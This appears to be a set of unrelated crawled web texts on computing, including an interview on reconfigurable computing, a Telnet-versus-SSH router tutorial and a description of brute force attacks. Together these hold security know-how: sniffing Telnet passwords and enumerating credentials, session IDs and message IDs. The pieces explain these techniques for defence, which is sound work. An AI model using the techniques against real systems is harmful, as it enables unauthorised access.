Alan George: HPC is approaching a crossroads in terms of enabling technologies and their inherent strengths and weaknesses. Goals and challenges in three principal areas are vitally important yet increasingly in conflict: performance, productivity, and sustainability. For example, HPC machines lauded in the upper tier of the TOP500 list as most powerful in the world are remarkably high in performance yet also remarkably massive in size, energy, heat, and cost, all featuring programmable, fixed-logic devices, for example, CPU, GPU, Cell. Meanwhile, throughout society, energy cost, source, and availability are a growing concern. As life-cycle costs of energy and cooling rise to approach and exceed that of software and hardware in total cost of ownership, these technologies may become unsustainable.
By contrast, numerous research studies show that computing with reconfigurable-logic devices — FPGAs, et al. — is fundamentally superior in terms of speed and energy, due to the many advantages of adaptive, customizable hardware parallelism. Common sense confirms this comparison. Programmable fixed-logic devices no matter their form feature a “one size fits all” or “Jack of all trades” philosophy, with a predefined structure of parallelism, yet attempting to support all applications or some major subset. In contrast, the structure of parallelism in reconfigurable-logic devices can be customized, that is, reconfigured, for each application or task on the fly, being versatile yet optimized specifically for each problem at hand. With this perspective, fixed-logic computing and accelerators are following a more evolutionary path, whereas RC is relatively new and revolutionary.
It should be noted that RC, as a new paradigm of computing, is broader than FPGA acceleration for HPC. FPGA devices are the leading commercial technology available today that is capable of RC, albeit not originally designed for RC, and thus FPGAs are the focal point for virtually all experimental research and commercial deployments, with a growing list of success stories. However, looking ahead more broadly, reconfigurable logic may be featured in future devices with a variety of structures, granularities, functionalities, etc., perhaps very similar to today’s FPGAs or perhaps quite different.
HPCwire: What role, or roles, do you see for RC technology in high performance computing and high performance embedded computing? Will RC be a niche solution in specific application areas or do you see this technology being used in general-purpose platforms that will be widely deployed?
George: Naturally, as a relatively new paradigm of computing, RC has started with emphasis in a few targeted areas, for example, aerospace and bioinformatics, where missions and users require dramatic improvement only possible by a revolutionary approach. As principal challenges — performance, productivity, and sustainability — become more pronounced, and as R&D in RC progresses, we believe that the RC paradigm will mature and expand in its role and influence to eventually become dominant in a broad range of applications, from satellites to servers to supercomputers. We are already witnessing this trend in several sectors of high-performance embedded computing. For example, in advanced computing on space missions, high performance and versatility are critical with limited energy, size, and weight. NASA, DOD, and other space-related agencies worldwide are increasingly featuring RC technologies in their platforms, as is the aerospace community in general. The driving issues in this community — again performance, productivity, and especially sustainability — are becoming increasingly important in HPC.
HPCwire: In the past couple of years, non-RC accelerators like the Cell processor and now, especially, general-purpose GPUs have been making big news in the HPC world, with major deployments planned. What has held back reconfigurable computing technology in this application space?
George: There are several reasons why Cell and GPU accelerators are more popular in HPC at present. Perhaps most obviously, they are viewed as inexpensive, due to leveraging of the gaming market. Vendors have invested heavily, in both marketing and R&D, to broaden the appeal of these devices for the HPC community. Moreover, in terms of fundamental computing principles, they are an evolutionary development in device architecture, and as such represent less risk. However, we believe that inherent weaknesses of any fixed-logic device technology … in terms of broad applicability at speed and energy efficiency, will eventually become limiting factors.
By contrast, reconfigurable computing is a relatively new and immature paradigm of computing. Like any new paradigm, there are R&D challenges that must be solved before it can become more broadly applicable and eventually ubiquitous. With fixed-logic computing, the user and application have no control over underlying hardware parallelism; they simply attempt to exploit as much as the manufacturer has deemed to provide. With reconfigurable-logic computing, the user and application define the hardware parallelism, featuring wide and deep parallelism as appropriate, with selectable precision, optimized data paths, etc., up to the limits of total device capacity. This tremendous advantage in parallel computing potency comes with the challenge of complexity. Thus, as is natural for any new paradigm and set of technologies, design productivity is an important challenge at present for RC in general and FPGA devices in particular, so that HPC users, and others, can take full advantage without having to be trained as electrical engineers.
It should be noted that this life-cycle is commonplace in the history of technology. An established technology is dominant for many years; it experiences growth over a long period of time from evolutionary advances, and one day it is partially or wholly supplanted by a new, revolutionary technology, but only after that new technology has navigated a long and winding road of research and development. Productivity is often a key challenge for a new IT technology, learning how to effectively harness and exploit the inherent advantages of the new approach.
HPCwire: What do you see on the horizon that could propel reconfigurable computing into a more mainstream role?
George: There are two major factors on the horizon that we believe will dramatically change the landscape. One factor is the trend for performance, productivity, and sustainability borne by growing concerns with conventional technologies about speed versus energy consumption, which increasingly favors RC. The conventional model of computing with fixed-logic multicore devices is limiting in terms of performance per unit of energy as compared to reconfigurable-logic devices. However, RC is viewed by many as lagging in effective concepts and tools for application development by domain scientists and other users to harness this potency without special skills. Thus, the second factor is taming this new paradigm of computing and innovations in its technologies, so that it is amenable to a broader range of users. In this regard, many vendors and research groups are conducting R&D and developing new concepts, tools, and products to address this challenge. In the future, RC will become more important for a growing set of missions, applications, and users and, concomitantly, it will become more amenable to them, so that productivity is maximized alongside performance and sustainability.
HPCwire: The new Novo-G reconfigurable computing system at the NSF Center for High-Performance Reconfigurable Computing (CHREC) has been up and running for just a few months. Can you tell us about the machine and what you hope to accomplish with it?
George: Novo-G became operational in July of this year and is believed to be the most powerful RC machine ever fielded for research. Its size, cooling and power consumption are modest by HPC standards, but they hide its computational superiority. For example, in our first application experiment working with domain scientists in computational biology, performance was sustained with 96 FPGAs that matched that of the largest machines on the NSF TeraGrid, yet provided by a machine that is hundreds of times lower in cost, power, cooling, size, etc.
Housed in three racks, Novo-G consists of 24 standard Linux servers, plus a head node, connected by DDR InfiniBand and GigE. Each server features a tightly-coupled set of four FPGA accelerators on a ProcStar-III PCIe board from GiDEL supported by a conventional multicore CPU, motherboard, disk, etc. Each FPGA is a Stratix-III E260 device from Altera with 254K logic elements, 768 18×18 multipliers, and more than 4GB of DDR2 memory directly attached via three banks. Altogether, Novo-G features 96 of these FPGAs, with an upgrade underway that by January will double its RC capacity to 192 FPGAs via two coupled RC boards per server.
The purpose of Novo-G is to support a variety of research projects in CHREC related to RC performance, productivity and sustainability. Founded in 2007, CHREC is a national research center under the auspices of the I/UCRC program of the National Science Foundation and consists of more than 30 academic, industry and government partners working collaboratively on research in this field. In addition, several new collaborations have been inspired by Novo-G, with other research groups, for example, Boston University and the Air Force Research Laboratory, as well as tools vendors such as Impulse Accelerated Technologies and Mitrionics.
HPCwire: Can you talk about a few of the projects at CHREC that look especially promising?
George: On-going research projects at the four university sites of CHREC — the University of Florida, Brigham Young University led by Dr. Brent Nelson, George Washington University led by Dr. Tarek El-Ghazawi, and Virginia Tech led by Dr. Peter Athanas — fall into four categories: productivity, architecture, partial reconfiguration, and fault tolerance. In the area of productivity, several projects are underway, crafting novel concepts for design of RC applications and systems, including new methods and tools for design formulation and prediction, hardware virtualization, module and core reuse, design verification and optimization, and programming with high-level languages. With respect to architecture, researchers are working to characterize and optimize new and emerging devices — both fixed and reconfigurable logic — and systems, as well as methods to promote autonomous hardware reconfiguration. Both of these project areas of productivity and architecture relate well to HPC.
Meanwhile, one of the unique features of some RC devices is their ability to reconfigure portions of the hardware of the chip while other portions remain unchanged and thus operational, and this powerful feature involves many research and design challenges being studied and addressed by several teams. Last but not least, as process densities increase and become more susceptible to faults, environments become harsher, and resources become more prone to soft or hard errors, research challenges arise in fault tolerance. In this area, CHREC researchers are developing device- and system-level RC concepts and architectures to support scenarios that require high performance, versatility, and reliability with low power, cooling, and size, be it for outer space or the HPC computer room. | <urn:uuid:c756bdae-6b45-48ce-9111-29875f967431> | CC-MAIN-2017-04 | https://www.hpcwire.com/2009/11/20/reconfigurable_computing_research_pushes_forward/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00358-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947804 | 2,571 | 2.609375 | 3 |
Halloween is a time when people of all ages dress up as something spooky that they’re really not. For the scariest of hackers, every day is like a reverse Halloween as they try to scam victims by pretending to be someone safe and trustworthy--a persona that they’re really not. This Halloween, don’t get tricked by the haunted hack!
Tricks of this nature are categorized as social engineering, and unlike a child dressed as a ghoul on Halloween, scams of the social-engineering variety are much more difficult to spot. When it comes to protecting yourself from these targeted scams, it’s imperative that you know what to look for. Also, in the same way you check your kid’s trick-or-treat candy for anything that might be harmful, you need to view unsolicited digital communications with a degree of healthy skepticism.
Unfortunately, social engineering tactics like phishing scams work, which is why hackers increasingly use them. This begs the question: why do users so easily fall for these scams, even when they're aware of the security risks? Researchers from the University of Erlangen-Nuremberg in Germany sought to find out by studying the reasons why people click on malicious links.
The findings were presented by Zinaida Benenson at the most recent Black Hat convention in Las Vegas. Benenson attributed the "success" of a malicious link to the hacker's ability to understand the circumstances of the scam and to personalize the link to appeal to the victim. "By a careful design and timing of the message, it should be possible to make virtually any person to click on a link, as any person will be curious about something, or interested in some topic, or find themselves in a life situation that fits the message content and context."
Translation: even with proactive training and education, the best employee could still click on a link if doing so fits their current interests or piques their curiosity. ZDNet uses the example of a partygoer who attends an event and then receives an email containing a link to photos of the party. Naturally, the user will want to click on the link, regardless of where it's from. In this example, the hacker effectively appeals to the victim's natural curiosity about what might be contained within; coupled with such personalized context, it's almost guaranteed that they'll click it.
Another example would be an employee who’s experiencing technical trouble with a workstation. They’ll then receive an email from “tech support” suggesting they click on a link and download remote access software. If the employee is frustrated and they can’t get their PC to work properly, they will follow the email’s instructions for two reasons: 1) The context fits the situation, and 2) People tend to trust tech support.
Like the work it takes to create an impressive Halloween costume, these hacks rely on a level of preparation and cunning by the hackers. This kind of personalized attention makes social engineering scams particularly challenging to protect oneself against.
Essentially, the possibilities for you and your employees to be tricked by spear phishing attacks and end-user errors are limitless, so long as a hacker knows how to appeal to what a user cares about. At the end of the day, having a staff that knows how to spot a trick, and a network that’s free from scary threats, is the greatest treat a business owner can ask for.
Have a safe and Happy Halloween from all of us at Nerds That Care. | <urn:uuid:7d11dd69-5245-4544-b6c4-360a82bce4f4> | CC-MAIN-2017-04 | https://nerdsthatcare.com/nerd-alerts/entry/this-halloween-dress-like-a-hacker-and-terrify-your-it-administrator | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00046-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.938571 | 742 | 2.515625 | 3 |
As technology expands within school districts around the globe, educational organizations continue to face the challenges of bridging the gap between their IT departments and curriculum teams. While IT seeks to have control over tools and network resources, educators desire to provide technology resources to their teachers and students in an effort to improve personalized learning. Can they work together? Is there an opportunity to create an environment where both IT and educators can collaborate? In today’s session, presenters and Ridley School District IT experts, Don Otto and Ray Howanski, showed it’s possible.
Ridley School District comprises nine schools, 5,600 students and 600 faculty and administrators. They have 6,000 iPads, 1,300 Mac OS laptops and 530 Mac OS desktops, along with other devices. They have productivity apps, a SIS and LMS, Jamf as a mobile device management (MDM) tool and a slew of instructional apps. They have ten 40GB WAN connections, 476 wireless APs and redundant core routers. And with a complex server infrastructure and only a small support team (8 building-level techs, 5 IS/IT support staff, 1 Apple repair tech and 1 network engineer), it's no surprise they want to keep a handle on their vast network.
With the virtually infinite amount of information available to schools, there's no doubt that IT needs to control that gateway; however, educators want the access and availability to utilize this information to better their instruction. From the curriculum perspective, they know more access means better communication for students and teachers, along with more powerful presentation tools. But they know it's still essential to involve IT to avoid spam or privacy breaches.
Additionally, instructionalists want the best product for each content and often cite what the sales person told them about the product – the reasons they can’t live without it or how easily the product is able to integrate into their current infrastructure. However, by bringing IT into these conversations, they’re able to get a better understanding of how this can realistically work within their district’s infrastructure.
Otto and Howanski said that while the two groups were far apart, there was room to grow together. Through collaboration and understanding, they design sustainable learning environments.
“To have a sustainable learning environment, we need to continually have this future-forward conversation,” Otto said.
All in all, by sharing goals, having open discussions before making decisions, and providing ongoing, daily feedback as conditions and knowledge change, both IT and educators at Ridley were able to meet their individual needs and achieve results.
Supercomputing takes new direction at Oak Ridge
- By Henry Kenyon
- Mar 29, 2012
An ongoing program to upgrade the Jaguar supercomputer at the Oak Ridge National Laboratory in Tennessee will not only result in a much more powerful computer, it will also create a new and unique research tool. When it is complete, the updated machine, which will be called Titan, will be able to perform calculations at speeds approaching 20 petaflops, reclaiming its title as the world's fastest computer.
The Titan effort is the beginning of a new architectural design path toward much more powerful and energy-efficient computers, said Jack Wells, director of science at the laboratory’s Oak Ridge Leadership Computing Facility (OLCF). Graphics accelerators are key to this new approach because they provide great processing power in a very efficient power-and-size combination. There are other options for achieving efficiency, but this is Oak Ridge’s current approach, he told GCN.
One reason for new architecture considerations is to help increase performance. Clock speeds for microchips peaked in 2004 when it became impractical to mass produce faster chips, Wells said.
Since then, manufacturers and computer designers have moved onto multicore methods with multiple chips operating in parallel to achieve improved performance. “If clock speed doesn’t increase, you see an increase in parallelism,” he said.
But although there is an increase in parallel processing for high-performance computing, general-purpose processors are not energy efficient. Increased parallelism requires better performance and lower energy consumption, Wells said. This is one reason that supercomputer designs are now relying on hardware such as the Nvidia graphical processing units and Intel multicore processors, he added.
GPUs act as accelerators to speed up computer performance while staying within the same physical footprint and power envelope, Wells said. The upgrades during the Jaguar transition to Titan will push the machine’s processing speed up in increments, from 10 to 20 and perhaps 30 petaflops, he said.
The upgrade and transition to Titan is part of the Energy Department’s user facility concept. The department meets its mission by providing large-scale, unique facilities and systems that university and corporate computers cannot replicate, Wells said. The Oak Ridge supercomputing facility falls under the department’s mandate for “big science” operations, he added.
DOE provides its facilities to researchers through calls for proposals. At the OLCF, the most compelling research projects that require the processing and modeling power of Jaguar/Titan are considered, Wells said. This process makes the facility reliant on user proposals. “We’re not executing a research program; we’re executing a user program,” he said.
When the Titan program was proposed in 2009, there was some question within DOE about whether any users would be able to use such a powerful computer, Wells said. The primary challenge was to establish that a variety of scientific software could run on the new machine.
Some of the software codes that run on Titan include S3D, which is used in the direct numerical study of combustion, and De Novo, software that models radiation transport — a critical part of the work at Oak Ridge because it is used to model neutron transfer in reactor cores. Other types of scientific software model everything from molecular dynamics to atmospheric movements.
The software will run on Titan to support a variety of government, academic and commercial research projects. These include an effort, run by the Sandia National Laboratory in New Mexico, to better understand turbulent fuel combustion. This kind of research is demanding because modeling the combustion of chemically complex fuels under high pressure is difficult, Wells said.
The Oak Ridge/Sandia project slated to run on Titan is part of a federal program to study how efficiently biofuels combust. Results of the modeling software will affect how commercial industry designs and studies combustion, Wells said. He added that automobile manufacturers have proprietary software used in engine design, and data from tests such as this will be plugged into those companies’ modeling computers.
Oak Ridge tried to keep its users happy during the recently completed first phase of the upgrade by minimizing downtime and moving more slowly with the transition. This was achieved by shutting down half of the computer for upgrades while keeping the other half up and running, Wells said. When the newly upgraded half was reactivated, an initial user launch allowed testing of the new system. During the acceptance period, when the initial Titan upgrade was being tested, users with large jobs were brought in to help stress test the system. The machine was then briefly taken down to fully upgrade the remaining portion, he said. | <urn:uuid:04b83855-dd81-4414-bcec-bf1790207364> | CC-MAIN-2017-04 | https://gcn.com/articles/2012/03/29/doe-jaguar-titan-supercomputer-upgrade.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00442-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950368 | 954 | 3.171875 | 3 |
“History has shown that technology beats legislation, and criminals are best placed to capitalise on this opportunity,” the European Network and Information Security Agency (ENISA) noted in a recently released opinion paper on encryption.
The paper addresses the question of whether backdoors or key escrow schemes should be implemented in encryption solutions, so that law enforcement and security services are able to decrypt communication that could be vital to solving cases.
ENISA’s position is clear: the use of backdoors in cryptography is not a solution.
For one, criminals can simply switch to using cryptographic tools that do not have a backdoor, or create their own. Secondly, legitimate users are put at risk.
“There is a legitimate need to protect communications among individuals and between individuals and public and private organisations. Cryptography provides the electronic equivalent of letter cover, seal or rubber stamp and signature,” the agency noted.
“In the light of terror attacks and organised crime, law enforcement and intelligence services have requested to create means to circumvent these protection measures. While their aims are legitimate, limiting the use of cryptographic tools will create vulnerabilities that can in turn be used by terrorists and criminals, and lower trust in electronic services, which will eventually damage industry and civil society in the EU.”
Thirdly, as said at the beginning, technology moves at breakneck speed.
“New technologies which generate once off encryption keys between end users are now being deployed,” the agency pointed out. “These keys are not stored centrally by the operator. These types of technologies make lawful interception in a timely manner very difficult. There is every reason to believe that more technology advances will emerge that will continue to erode the possibility of identifying or decrypting electronic communications.”
Finally, it’s possible that a weakening of encryption technology may ultimately weaken other aspects of cryptology, as the same technology is used, for example, to create digital signatures. “The existence of back doors / key recovery mechanisms can also potentially undermine the authenticity of a document,” they added.
All in all, the agency pointed out many of the drawbacks previously noted by crypto experts and security professionals.
Earlier this year, European Data Protection Supervisor (EDPS) Giovanni Buttarelli also opined against backdoors in encryption tech. | <urn:uuid:ec482315-0df2-495b-abca-08a04eb9249b> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2016/12/14/crypto-backdoors-bad-idea/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00074-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.938462 | 475 | 2.53125 | 3 |
Kalid Azad, the brains behind InstaCalc (who is also a swell guy in general to talk to), runs a blog titled Better Explained. The name says it all, as BE strives to explain concepts, software development tactics and tools, and even math topics in simple, image-based lessons. I’d like to highlight one of these posts as Worthwhile Reading: A Visual Guide to Version Control.
If you’ve heard the name Subversion or Sourcesafe but had no idea what they were or wanted a better understanding of how these systems worked and their benefits, just clicky-click on that link. Here it is again if you missed your chance the first time.
Three popular Version Control Systems are listed below:
- Subversion (http://subversion.tigris.org/)
- Git (http://git.or.cz/)
- MS Visual Sourcesafe (http://msdn.microsoft.com/en-us/vs2005/aa718670.aspx)
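To get a feel for the basic workflow before reading further, here is what a minimal first session with Git might look like (the file name is just an example):

$ git init
$ git add notes.txt
$ git commit -m "First draft of notes"
$ git log --oneline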
If after reading the Better Explained article you’re looking for more advanced write-ups, you’ll probably find Source Control HOWTO, a series of articles from fellow University of Illinois alum Eric Sink, helpful and interesting.
In our last blog series we discussed multiple access commands that can be configured on a router or a switch. These commands included cosmetic commands such as logging synchronous and exec-timeout that can be configured on the console port. We also discussed configuring security features such as banners that can be used for legal purposes.
For this discussion we will compare Telnet and Secure Shell protocol (SSH). Both protocols can be used for remote access but their differences are important to any network technician or engineer.
First, to gain remote access to the virtual teletype (VTY) lines, a router or switch must be reachable with a given routed protocol, meaning IPv4 or IPv6. (This seems obvious, but it will be quite useful in a future discussion.) Additionally, for the access lines you must configure either a line password or a local user database as the way to authenticate to the device. Example 1 shows the basic setup of the default Telnet lines on this router.
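A sketch of what that configuration looks like (the password value is illustrative):

Router(config)# line vty 0 4
Router(config-line)# password cisco
Router(config-line)# login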
As you can see, a basic password has been configured. The other option (shown in example 2) is to use the local user database.
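A sketch of the local-database approach (the username and secret are illustrative):

Router(config)# username admin secret cisco
Router(config)# line vty 0 4
Router(config-line)# login local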
In either case, if someone needs to gain access to this device they will have to log in with the authentication type that was specified.
Second, by default Telnet is associated with the VTY lines. Telnet uses TCP port 23 and is one of the most commonly used protocols for remote access. However, Telnet doesn’t provide any type of confidentiality. In other words, it has no encryption mechanism. Eavesdroppers can easily discover messages that are passed between two devices using Telnet; in fact, programs such as Wireshark or Ethereal can see the passwords inside the Telnet packets. In example 3 you can see that the router on the right (ROUTER 0) is telnetting to the router on the left (ROUTER 1). Notice that I created an enable password of cisco on ROUTER1.
Example 4 displays the vulnerability of Telnet. As shown, I have Wireshark looking at the messages that are going between these two routers. The captured frame shows, inside the Telnet data, the password cisco being sent in one of the messages.
(OK, it says “cisc”, but frame 66 contains the letter “o”, so with a little work a skilled hacker, or even a novice, can see these messages sent in clear text.)
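You can reproduce this with any packet sniffer; for instance, the following capture command prints the cleartext payload of Telnet traffic (the interface name is illustrative):

# tcpdump -i eth0 -A tcp port 23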
The other common application for remote access to Cisco routers and switches is Secure Shell protocol (SSH). SSH runs on TCP port 22 and, unlike Telnet, does include encryption. SSH also requires more commands to set up than Telnet does. The first necessary command is to configure a local user database, as illustrated in example 2. The next command is mandatory: SSH needs to have a key for its connection, and that key’s name is derived from the hostname and the ip domain-name command. Example 5 displays creating a unique (local) domain name for the router.
After this is done you must generate a key. This is done with the command crypto key generate rsa. Examples 6 and 7 display two different ways to use this command to configure the RSA keys.
Example 6 is the full-blown way of configuring the general key. Example 7 displays the more interactive version of this command. This is useful for those who don’t know which key size may be necessary for a given application. Also demonstrated, in example 8, is the crypto key zeroize rsa command, which will erase the key.
Next, you must enable an SSH version and apply it to the VTY lines. First, with the global configuration command ip ssh version <1 or 2>, you can specify which version of SSH will be used for access. Second, you must configure the VTY lines for authentication against the local database with the line command login local, and specify that only SSH will be permitted to access these lines with the command transport input ssh. (transport input ssh telnet means only these two protocols will have access to the VTY lines; the default is transport input all, for all types of protocols.) These commands are displayed in the next example.
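Putting the pieces together, a minimal SSH setup looks something like this (the domain name and key size are illustrative):

Router(config)# ip domain-name example.local
Router(config)# crypto key generate rsa modulus 1024
Router(config)# ip ssh version 2
Router(config)# line vty 0 4
Router(config-line)# login local
Router(config-line)# transport input ssh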
The most common SSH client program used is called PuTTY. It is a freeware application that is used for Telnet, SSH and other protocols. Example 10 demonstrates basic configuration and successful access of SSH via PuTTY.
Example 11, below, is a contrast to example 4. You can see that the passwords aren’t shown and that the datagrams are encrypted above the layer 4 header. This gives SSH the advantage over Telnet in all remote access scenarios.
This now concludes our comparison of Telnet vs SSH. You can clearly see the advantages of SSH and why it is becoming a well-recognized security standard and accepted practice in the computer networking industry.
The quest for clean and renewable power is increasing globally year by year. Governments are looking at ways to solve their energy crisis, and interconnecting power grids is one of those. The challenge with network interconnection is that AC grids at different frequencies cannot be directly connected. A high voltage direct current (HVDC) system allows the asynchronous interconnection of networks that operate at different frequencies or are otherwise incompatible. HVDC systems are also fast becoming the preferred technology for long distance power transmission in view of their advantages over HVAC transmission systems.
The first long distance HVDC transmission was in 1882, from Miesbach to Munich in Germany: 1.5kW was transmitted over a distance of 57km. Now the longest transmission is the Rio Madeira transmission link in Brazil, which has a length of 2,385km and carries 7.1GW of power.
In these 130 years the concept of direct current has again become relevant, with people realizing its advantages in long distance transmission and how the problems faced earlier can be overcome. Thomas Edison popularized the concept of DC everywhere, but it never really caught the imagination of the people. Now, after extensive research and new innovations in this field, industry is again looking at HVDC to overcome the problems of HVAC transmission.
The average size of High-Voltage Direct Current (HVDC) transmission systems has increased in recent years. The market for HVDC systems is also growing, with more and more countries getting involved in HVDC transmission.
HVDC offers various advantages to power transmission utilities. It is much cheaper, and losses are lower, for long distance transmission when compared to AC. One of its greatest advantages is that it allows power to be transferred from one AC grid to another having a different frequency. This allows grid linking between regions that follow different grid frequencies.
The main concerns with HVDC are that its converter stations are expensive and multi-terminal systems are complex. There are many big players in the HVDC market, and they are coming up with innovative ideas to solve some of the issues concerning this market.
In HVDC the basic process is to convert AC to DC at the transmitting end, and to convert this DC back to AC at the receiving end. These conversions can be done by using rectifiers and inverters. Other important devices used are filters, thyristors, Insulated Gate Bipolar Transistors (IGBTs) and Voltage Source Converters (VSCs). There is a lot of research going into VSCs because they are one of the key elements for reducing losses. Power can be transmitted through overhead lines or undersea cables.
The report offers the Market Definition for HVDC transmission systems and identifies the key market drivers and restraints. A market analysis for the HVDC transmission systems Market, with region specific assessments and competition analysis on a global and regional scale have been carried out. Prospective opportunities and factors instrumental in changing the market scenarios have been analyzed in detail. An extensively researched competitive landscape section gives the profiles of major companies along with their share of markets, current strategies and key financial information. Macro and Micro factors that affect the HVDC transmission systems market on both a global and regional scale have been identified and analyzed. | <urn:uuid:183497e0-acbb-4f15-82e6-82dab941dc2b> | CC-MAIN-2017-04 | https://www.mordorintelligence.com/industry-reports/global-hvdc-transmission-systems-market-industry | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281069.89/warc/CC-MAIN-20170116095121-00433-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953456 | 670 | 3.359375 | 3 |
Load Balancing is a technique (usually performed by load balancers) to spread work between many computers, processes, disks or other resources in order to get optimal resource utilization and decrease computing time. A load balancer can be used to increase the capacity of a server farm beyond that of a single server. It can also allow the service to continue even in the face of server down time due to server failure or server maintenance.
If your organization's servers run applications that are critical to your business, chances are that you'd benefit from an application delivery solution. Today's Web applications can be delivered to users anywhere in the world and the devices used to access Web applications have become quite diverse.
At a projected market of over $4B by 2010 (Goldman Sachs), virtualization has firmly established itself as one of the most important trends in Information Technology. Virtualization is expected to have a broad influence on the way IT manages infrastructure. Major areas of impact include capital expenditure and ongoing costs, application deployment, green computing, and storage.
The idea of load balancing is well defined in the IT world: A network device accepts traffic on behalf of a group of servers, and distributes that traffic according to load balancing algorithms and the availability of the services that the servers provide. From network administrators to server administrators to application developers, this is a generally well understood concept.
Application Delivery Controllers understand applications and optimize server performance - offloading compute-intensive tasks that prevent servers from quickly delivering applications. Learn how ADCs have taken over where load balancers left off.
White Paper Published By: Cisco
Published Date: May 15, 2015
This guide will provide the steps necessary to configure a Microsoft Fast Track Small Implementation cloud built on EMC VSPEX, which is built on Cisco Unified Computing System and EMC VNXe technologies.
Free Offer Published By: WANdisco
Published Date: Oct 15, 2014
In this Gigaom Research webinar, the panel will discuss how the multi-cluster approach can be implemented in real systems, and whether and how it can be made to work. The panel will also talk about best practices for implementing the approach in organizations.
White Paper Published By: Globalscape
Published Date: Jul 31, 2014
Downtime happens, often at the worst possible time. Organizations experiencing downtime face direct and indirect costs from the loss of critical systems. This whitepaper discusses a Globalscape survey of 283 IT professionals and end users revealing the frequency of unplanned downtime, the effects on organizations, including average costs, and what IT administrators can do to minimize core system failure.
White Paper Published By: IBM
Published Date: Jul 14, 2014
This paper discusses the importance of workloads when planning for your migration to the cloud. It also describes how a structured approach to cloud workload analysis can help you identify cloud initiatives that offer faster time to value, reduced migration risk and higher potential return.
Just 400 milliseconds - the blink of an eye - is too long for users to wait for a webpage to load. Discover the website performance bottlenecks that push visitors to your competition, and mitigation strategies that will drive marketing success.
White Paper Published By: SilverSky
Published Date: Apr 16, 2013
SilverSky operates a major hosted infrastructure dedicated to providing world-class enterprise messaging solutions. This whitepaper is an in-depth overview of our Hosted Microsoft Exchange architecture and how we implement best practices across systems management, testing, application deployment, infrastructure and security to provide increased productivity and reduced costs.
White Paper Published By: CenturyLink
Published Date: Nov 18, 2011
There are more people on earth than total IPv4 addresses, and they're expected to run out by the end of 2011. Preparing for the transition now can help you maintain business continuity during the changeover while taking advantage of immediate business benefits.
Internal testing only allows you to see potential issues from within your own controlled environment, and does not test for the countless different scenarios in which a customer could be accessing your site. Find out the benefits of external load testing. | <urn:uuid:fb3a55e1-6bbe-43f9-be8f-77cdb036ec90> | CC-MAIN-2017-04 | http://research.crn.com/technology/networking/load_balancing | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280483.83/warc/CC-MAIN-20170116095120-00461-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.906375 | 839 | 2.671875 | 3 |
Brute force attacks use exhaustive trial and error methods in order to find legitimate authentication credentials.
The brute force attack is a method of obtaining a user's authentication credentials. Authentication is the process of determining if a user is who he/she claims to be. It is commonly performed through the usage of usernames and passwords. Knowledge of the password is assumed to guarantee that the user is authentic. Each user initially registers (or is registered by someone else) using an assigned or self-declared password. On each subsequent use, the user must know and use the previously declared password.
Using brute force, attackers attempt combinations of the accepted character set in order to find a specific combination that gains access to the authorized area. Consider the following illustrative login form.
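<!-- Minimal illustrative login form; the field names are hypothetical -->
<form method="POST" action="/login">
  Username: <input type="text" name="username">
  Password: <input type="password" name="password">
  <input type="submit" value="Log In">
</form>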
Attackers can use brute force applications, such as password guessing tools and scripts, in order to try all the combinations of well-known usernames and passwords. Such applications may use default password databases or dictionaries that contain commonly used passwords or they may try all combinations of the accepted character set in the password field.
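To make the exhaustive trial-and-error idea concrete, here is a minimal sketch in Python of how such a tool enumerates candidates (illustrative only; real tools add dictionaries, parallelism and lockout evasion):

# Enumerate every candidate password over a small character set,
# shortest first -- the essence of a brute force search.
import itertools
import string

charset = string.ascii_lowercase + string.digits

def candidates(max_length):
    for length in range(1, max_length + 1):
        for combo in itertools.product(charset, repeat=length):
            yield ''.join(combo)

# The attacker would submit each candidate to the login form in turn.
for guess in itertools.islice(candidates(2), 5):
    print(guess)  # prints a, b, c, d, e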
User identification is not always achieved with a username and password pair. Using a brute force tool makes it easy to find a legitimate session ID that appears in a URL (see Parameter Tampering). A session ID is an identification string used to associate specific Web pages with a specific user. The following hypothetical URL shows such a session ID.
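http://www.greetingcards.example/viewcard.asp?sessionID=a1b2c3d4e5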
This is an example of a greeting card site that has a unique session ID for each greeting card. Using Brute Force applications, attackers may try thousands of session IDs embedded in a legitimate URL in an attempt to view greeting cards that they are not authorized to view.
It is relatively easy to find a legitimate key for an object ID. For example, consider a URL such as:
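http://www.mydomain.com/displaymsg.asp?msgID=12345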
In this example, the dynamic page requested by the browser is called Displaymsg.asp, and the browser sends the Web server the parameter msgID with a value of 12345. An attacker may try brute force values for msgID to try and read other users' messages.
clock timezone zone hours-offset [minutes-offset]
Here are explanations for each parameter:
zone: The name of the time zone to be displayed when standard time is in effect.
hours-offset: The hours difference from UTC.
minutes-offset: The (optional) minutes difference from UTC.
The system keeps time internally in UTC; the zone and offset you specify determine only how the time is displayed. For more information you may wish to refer to: clock timezone
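For example, to display US Pacific Standard Time (the zone name is arbitrary text):

Router(config)# clock timezone PST -8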
SNMP for Everybody
Managing a small network isn't all that difficult. When something doesn't work, it's usually obvious where the fault lies. But even for a small network, having some kind of management and monitoring in place is helpful. As your network grows, it becomes even more important to have some tireless automated watchdogs keeping an eye on things.
The computer world is cram-full of monitoring, alerting, and management tools of all kinds, from nice free Open Source applications like MRTG, Cacti, Nagios, OpenNMS, and Mon, to expensive commercial suites that do everything but cook breakfast like ZenWorks, HP OpenView, and Tivoli. These perform a range of different duties, such as network discovery and mapping, providing real-time status indicators, reporting outages, tracking processes, disk usage, restarting downed servers and shutting down devices in trouble.
The one thing these all have in common is they are SNMP-aware. SNMP (Simple Network Management Protocol) has been around since the '80s. The idea was to create a standard protocol for managing IP (Internet Protocol) devices, rather than having a hodge-podge of different applications and suites that use differing, incompatible client agents.
